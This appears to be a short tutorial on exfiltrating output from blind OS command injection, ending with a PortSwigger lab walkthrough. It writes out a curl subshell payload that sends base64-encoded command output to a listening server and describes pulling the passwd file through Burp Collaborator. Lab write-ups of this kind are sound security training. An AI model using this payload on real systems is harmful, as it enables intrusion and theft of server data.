Command injection is a vulnerability that allows user input GNU/Linux terminal commands and also in Windows, this occurs because the incorrect programming in parameters or inputs using internal functions like sys and os in general cases. I won’t go over all the things about this vulnerability, but I will explain a method to extract more data from blind command on linux.
In many scenarios we can get the command injection and sometimes it not return the output on the screen of the webpage, thinking about the return of the output, we can try retrieve the data making a out-of-band request and parse the command injection in the URL.
To demonstrating this situation I opened a Python local server and in other terminal i make a request parsing id command that starts a subshell. The Python server shows GET request with a fragment of output.
It occurs because the some special characters and spaces, an alternative is use base64 encoding, this treats about a lot of characters and the return can show more things.
To deal with new lines when the base64 is too big, we can remove the “\n” with the command TR (abbreviation of translate).
We known that in the web application the command injection doesn’t work only with the command, we have to set other subshell command in the same payload: $ ( <Command> `<Command2>` ) .
$(curl http://0.0.0.0:8000/`id` | base64 | tr -d "\n")So far we have developed knowledge around payload, now let’s explore the scenario in the PortSwigger platform.
The vulnerability was in the email input that we can inject the command:
Intercepting the feedback request with Burp Suite:
In this case we will use the burp-collaborator to receive the command getting the passwd file in the URL with base64 encode via HTTP:
Decryption shows the entire passwd file from the server machine.
Thank you to read until here, you can develop more alternatives and try return more files with this method, increase your knowledge about this command and try new things.
Laboratory: https://portswigger.net/web-security/os-command-injection
